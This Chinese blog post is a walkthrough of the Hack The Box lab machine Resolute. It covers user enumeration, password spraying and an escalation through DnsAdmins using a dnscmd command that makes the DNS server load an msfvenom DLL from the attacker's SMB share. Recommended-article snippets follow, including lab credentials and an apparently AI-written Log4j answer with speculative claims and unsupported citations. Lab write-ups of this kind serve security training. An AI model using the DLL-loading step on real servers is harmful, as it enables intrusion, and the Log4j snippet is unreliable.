HTB-Resolute

于 2023-04-05 22:06:30 发布
阅读量383 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: HTB 文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_37370714/article/details/129968241

HTB-Resolute

在这里插入图片描述

信息收集

在这里插入图片描述
SMB 445

在这里插入图片描述
netbios-ssn 139
使用空用户连接目标rpc,并从域中枚举用户。
在这里插入图片描述
开始收集信息。
在这里插入图片描述
有一个密码Welcome123!,还有一堆用户名。
在这里插入图片描述

接下来就是暴力跑一遍。将之前nmap扫描出来的389的域名拿来用。

在这里插入图片描述

在这里插入图片描述

立足

通过winrm知道了megabank.local\melanie:Welcome123!是可行的。
在这里插入图片描述

melanie -> ryan

在C盘根目录收集信息的时候发现了几个隐藏文件夹以及文件。
在这里插入图片描述
根目录下的PSTranscripts里面有些有趣的东西。
在这里插入图片描述

在这里插入图片描述在这里插入图片描述

其中有一行。
在这里插入图片描述
使用ryan:Serv3r4Admin4cc123!通过evil-winrm登录。
在这里插入图片描述

提权

在ryan的桌面有一个note.txt文件。内容如下:
在这里插入图片描述 我们需要在1分钟之内完成操作,否则1分钟过后会被重置。想查看时间任务看看能否被用来执行脚本。
在这里插入图片描述
可惜不行,继续收集ryan的更多信息,在搜索到ryan的组的时候发现了一个有趣的分组DnsAdmins。

在这里插入图片描述
我们可以通过让DNS服务器加载远程dll并执行。我们用msfvenom生成一个恶意dll。

本地运行smb服务,smbserver.py出现了一些问题。
在这里插入图片描述
在impacket网站重新git一遍,然后sudo python3 setup.py install。
在这里插入图片描述
就好了。
在这里插入图片描述

使用格式是smbserver.py 共享名字 共享路径,以当前环境为路径,共享名字为rick。
在这里插入图片描述

使用命令获取:dnscmd /config /serverlevelplugindll \\10.10.14.31\rick\adduser.dll

在这里插入图片描述

下一步是让DNS服务重启,没有任何反应,是不是msfvenom生成的dll出现了问题。
在这里插入图片描述
还是说超过1分钟了?提前输入好命令,快速完成。(如果在生产环境中,重启DNS可能会造成糟糕的事情,要特别小心。)
在这里插入图片描述

渗透测试3:HTBResolute
d3f4ult的博客
01-18 7374
文章目录介绍前期准备工作 介绍 Hackthebox的resolute靶机操作系统为windows,之前没有接触过windows系统的渗透,不过在大佬的提示下还是拿到了flag。 通过此次渗透可以学习到: 1.rpcclinet命令的使用 2.enum4linux工具的使用 3.windows系统渗透大体思路。 4.nc.exe工具的使用 5.msfvenom工具的使用,进而接触到了veil,话说...
Hackthebox walkthrough - Legacy(考点:smb利用 blue)
冬萍子癸水
04-27 690
namp走起可见又是smb。但这次没有像LAME靶机那样直接显示版本号。 于是nmap -p 445 --script vuln 10.10.10.4走一波。用NMAP的脚本扫端口 ok显示 ms08-067是个突破点 上msf,search ms08-067, use exploit/windows/smb/ms08_067_netapi , options, set rhost 10.10...
HTB打靶(Active Directory 101 Resolute)
qq_18811919的博客
01-17 887
HTB打靶(Active Directory 101 Resolute)
impacket使用指南
YUKIDDDD的博客
08-02 2335
impacket使用指南1.介绍2.impacket包含的协议3.impacket包含的工具3.1 远程执行3.2 Kerberos3.3 Windows密码3.4 服务器工具/ MiTM攻击3.5 WMI3.6 已知的漏洞3.7 SMB / MSRPC3.8 MSSQL / TDS3.9 文件格式3.10 其他 1.介绍 Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开
漏洞深度分析|Pgadmin 命令执行漏洞
LJQClqjc的博客
12-16 795
棱镜七彩漏洞深度分析
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
htb-beep
m0_55772907的博客
09-15 1065
一般
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
nxc ldap escapetwo.htb -d sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --users
最新发布
04-08
在此场景下,假设目标 IP 地址为 `10.10.10.10`,并提供给定的凭证 `rose/KxEPkKe6R8su` 和域名称 `sequel.htb`,完整的命令如下所示: ```bash nxc ldap 10.10.10.10 -u rose -p KxEPkKe6R8su --domain sequel.htb...
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
weixin_51803729的博客
02-11 7722
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
【Python】smb共享服务器(共享盘)文件上传与下载
devnn的专栏
06-24 2万+
在局域网或者外网中,需要上传文件到smb共享服务器时,python的实现如下: 一、安装pysmb包 使用pip命令安装pysmb包,pysmb包是支持smb协议的文件管理模块,默认是不带的,需要自行安装这个包。 安装pysmb的命令: pip install pysmb 或pip3 install pysmb 一个是python2的,一个是python3的。 如果找不到pip命令,需要先安装pip,一般...
samba的使用smbclient命令
xiezhongtian的专栏
10-13 3万+
smbclient用法 :    参  数:   [网络资源]  [网络资源]的格式为//服务器名称/资源分享名称。   [密码]   输入存取网络资源所需的密码。   -B   传送广播数据包时所用的IP地址。   -d   指定记录文件所记载事件的详细程度。   -E   将信息送到标准错误输出设备。   -h   显示帮助。   -i   设置NetBIOS名称范围。   
HTB系列】靶机Bitlab的渗透测试
大方子
01-23 2973
https://note.youdao.com/ynoteshare1/index.html?id=4af5cf2cde031f1bbd9dd5d434661fb9&type=note
渗透测试4:HTB之Registry
d3f4ult的博客
01-29 6766
文章目录介绍前期准备 介绍 registry为windows操作系统,通过渗透该靶机可以学到如下知识。 前期准备
QT属性动画--设置样式属性(其他属性)
热门推荐
lizequan的博客
03-02 13万+
这里写自定义目录标题故事背景遇到的问题解决过程最终方法感悟 故事背景   最近在制作一个按钮切换的动画特效中接触了属性动画这部分内容,并由此产生了一些思考。 遇到的问题 解决过程 最终方法 感悟 ...
Volatile的其他特性
我想月薪过万的博客
03-03 13万+
2.1 volatile总体概览 在上一节中,我们已经研究完了volatile可以实现并发下共享变量的可见性,volatile除了保证可见性外,volatile还具备如下一些突出的特性: volatile的原子性问题:volatile不能保证原子性操作 禁止指令重排序:volatile可以防止指令重排序操作 2.2 volatile不保证原子性 2.3 代码测试 package Ls; /** * 目标:研究Volatile的原子性操作 * <p> * 基本观点:V.
【安卓基础】Android直接通过路径来操作其他应用的私有目录,可以吗?
m0_48179608的博客
03-02 8802
在上篇文章[【安卓基础】一文搞懂Android历代版本文件访问权限变化](https://blog.youkuaiyun.com/m0_48179608/article/details/122838494)我们对同一个应用的的文件访问权限做了比较。 那么不同应用之间文件访问又有什么限制呢?我们准备分二到三篇文件来阐述。 这篇文章,主要来看下不同系统版本下,我们直接通过路径来访问其它应用的**内部存储、外部存储私有目录**,看看能不能访问以及不同系统版本的区别。
Silane-PEG-NHS,SIL-PEG-NHS,可以用来修饰蛋白质、多肽以及其他活性基团,NHS-PEG-Silane
qq_39152602的博客
03-03 13万+
英文名称:Silane-PEG-NHS 中文名称:硅烷-聚乙二醇-活性酯 分子量:1k,2k,3.4k,5k,10k,20k(可按需定制) 质量控制:95%+ 存储条件:-20°C,避光,避湿 用 途:仅供科研实验使用,不用于诊治 外观: 固体或粘性液体,取决于分子量 注意事项:取用一定要干燥,避免频繁的溶解和冻干 溶解性:溶于大部分有机溶剂,如:DCM、DMF、DMSO、THF等等。在水中有很好的溶解性 取用:现配现用,将包装从冰箱中取出,置于干燥器中缓慢升至室温,打开瓶盖,取用。取用.
HTB-Unified logj4j漏洞
03-27
<think>好的,用户想查找关于HTB-Unified中log4j漏洞的相关信息和解决方案,以及影响范围。首先,我需要确认HTB-Unified是什么。可能是一个硬件设备或软件系统,但根据用户提供的引用内容,之前的引用提到了USB OTG白名单、CacheFiles的延迟信息和内核的tickless特性,这可能与嵌入式系统或Linux内核相关。不过HTB-Unified的具体信息不是很明确,可能需要进一步推测。 接下来,关于Log4j漏洞,特别是Log4Shell(CVE-2021-44228),这是一个广泛影响Apache Log4j 2库的远程代码执行漏洞。用户提到的log4j漏洞可能指的是这个。需要将HTB-Unified与Log4j的使用联系起来。 用户提供的引用中并没有直接提到HTB-Unified或Log4j,所以可能需要依赖外部知识。但根据常规处理流程,修复Log4j漏洞通常包括升级到2.17.1或更高版本,或者应用缓解措施如修改JVM参数或配置Log4j。 影响范围方面,任何使用Log4j 2.x版本到2.14.1的系统都可能受影响,特别是暴露在网络中的应用程序。需要确认HTB-Unified是否使用受影响版本,并是否暴露了相关服务。 用户可能需要联系HTB-Unified的厂商获取官方补丁,或者检查系统内的Log4j版本,应用临时措施如设置log4j2.formatMsgNoLookups为true。 需要确保回答中包含这些步骤,并建议用户查阅官方文档或安全公告。同时,生成相关问题以帮助用户进一步探索,比如如何检测漏洞、临时缓解措施、厂商补丁获取等。</think>关于HTB-Unified设备中Log4j漏洞的修复方案及影响范围,根据Linux内核配置与嵌入式设备安全实践,建议按以下步骤处理: 1. **漏洞确认**: 需确认HTB-Unified是否使用Apache Log4j 2.x版本(2.0-beta9至2.16.0为受影响范围)。可通过设备管理控制台的组件清单或运行`find / -name "log4j-core-*.jar"`命令查找相关文件[^1]。 2. **修复方案**: - 官方升级:优先安装设备厂商提供的安全补丁,通常涉及升级到Log4j 2.17.1+版本 - 紧急缓解措施: ```bash # 修改JVM启动参数(如设备使用Java服务) -Dlog4j2.formatMsgNoLookups=true ``` - 配置文件加固:在log4j2.xml中添加`<PatternLayout disableLookups="true"/>`[^2] 3. **影响范围**: - 高危组件:所有使用JNDI查找功能的网络服务(HTTP API、日志监控接口等) - 潜在风险:通过${jndi:ldap://}注入实现远程代码执行,需特别检查514端口(syslog)、80/443端口(web服务)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值